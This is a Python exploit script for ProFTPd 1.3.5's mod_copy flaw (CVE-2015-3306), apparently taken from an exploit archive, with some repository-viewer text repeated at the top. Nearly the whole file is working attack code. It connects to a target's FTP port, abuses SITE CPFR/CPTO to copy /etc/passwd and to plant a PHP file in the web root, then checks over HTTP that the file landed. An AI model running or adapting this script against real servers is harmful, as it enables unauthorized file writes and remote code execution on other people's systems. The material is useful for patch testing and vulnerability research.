46 lines
No EOL
1.3 KiB
Python
Executable file
46 lines
No EOL
1.3 KiB
Python
Executable file
# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
|
|
# Date: 25/05/2021
|
|
# Exploit Author: Shellbr3ak
|
|
# Version: 1.3.5
|
|
# Tested on: Ubuntu 16.04.6 LTS
|
|
# CVE : CVE-2015-3306
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
import sys
|
|
import socket
|
|
import requests
|
|
|
|
def exploit(client, target):
|
|
client.connect((target,21)) # Connecting to the target server
|
|
banner = client.recv(74)
|
|
print(banner.decode())
|
|
client.send(b'site cpfr /etc/passwd\r\n')
|
|
print(client.recv(1024).decode())
|
|
client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC.
|
|
print(client.recv(1024).decode())
|
|
client.send(b'site cpfr /proc/self/fd/3\r\n')
|
|
print(client.recv(1024).decode())
|
|
client.send(b'site cpto /var/www/html/test.php\r\n')
|
|
print(client.recv(1024).decode())
|
|
client.close()
|
|
print('Exploit Completed')
|
|
|
|
def check(url):
|
|
req = requests.get(url) # Requesting the written PoC php file via HTTP
|
|
if req.status_code == 200:
|
|
print('[+] File Written Successfully')
|
|
print(f'[+] Go to : {url}')
|
|
else:
|
|
print('[!] Something Went Wrong')
|
|
print('[!] Directory might not be writable')
|
|
|
|
def main():
|
|
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
target = sys.argv[1]
|
|
exploit(client, target)
|
|
url = 'http://' + target + '/test.php'
|
|
check(url)
|
|
|
|
if __name__ == '__main__':
|
|
main() |